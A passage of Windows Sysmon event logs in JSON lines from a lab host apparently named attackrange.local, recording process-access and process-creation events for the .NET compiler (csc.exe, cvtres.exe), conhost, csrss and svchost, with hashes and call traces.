{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5188,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.315\r\nSourceProcessGUID: {41C8662E-20CF-5F25-0000-00104CF50700}\r\nSourceProcessId: 4536\r\nSourceThreadId: 4616\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20D1-5F25-0000-001065390800}\r\nTargetProcessId: 3904\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.315","SourceProcessGUID":"{41C8662E-20CF-5F25-0000-00104CF50700}","SourceProcessId":"4536","SourceThreadId":"4616","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20D1-5F25-0000-001065390800}","TargetProcessId":"3904","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5189,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.383\r\nProcessGuid: {41C8662E-20D1-5F25-0000-0010133D0800}\r\nProcessId: 1184\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nFileVersion: 12.00.52519.0 built by: VSWINSERVICING\r\nDescription: Microsoft® Resource File To COFF Object Conversion Utility\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CVTRES.EXE\r\nCommandLine: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RESB4FF.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\g41gztmo\\CSCE429C1F2A84A4C8B9F4071352626B24A.TMP\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20CF-5F25-0000-00209EF40700}\r\nLogonId: 0x7F49E\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF\r\nParentProcessGuid: {41C8662E-20D1-5F25-0000-001065390800}\r\nParentProcessId: 3904\r\nParentImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nParentCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\g41gztmo\\g41gztmo.cmdline\"","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.383","ProcessGuid":"{41C8662E-20D1-5F25-0000-0010133D0800}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","FileVersion":"12.00.52519.0 built by: VSWINSERVICING","Description":"Microsoft® Resource File To COFF Object Conversion Utility","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"CVTRES.EXE","CommandLine":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RESB4FF.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\g41gztmo\\CSCE429C1F2A84A4C8B9F4071352626B24A.TMP\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20CF-5F25-0000-00209EF40700}","LogonId":"0x7f49e","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF","ParentProcessGuid":"{41C8662E-20D1-5F25-0000-001065390800}","ParentProcessId":"3904","ParentImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","ParentCommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\g41gztmo\\g41gztmo.cmdline\"","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5190,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.377\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001065390800}\r\nSourceProcessId: 3904\r\nSourceThreadId: 2516\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetProcessGUID: {41C8662E-20D1-5F25-0000-0010133D0800}\r\nTargetProcessId: 1184\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.377","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001065390800}","SourceProcessId":"3904","SourceThreadId":"2516","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetProcessGUID":"{41C8662E-20D1-5F25-0000-0010133D0800}","TargetProcessId":"1184","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5191,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.377\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20D1-5F25-0000-0010133D0800}\r\nTargetProcessId: 1184\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.377","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20D1-5F25-0000-0010133D0800}","TargetProcessId":"1184","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5192,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.377\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.377","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5193,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.377\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.377","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5194,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.377\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.377","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5195,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.377\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.377","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5196,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.377\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: 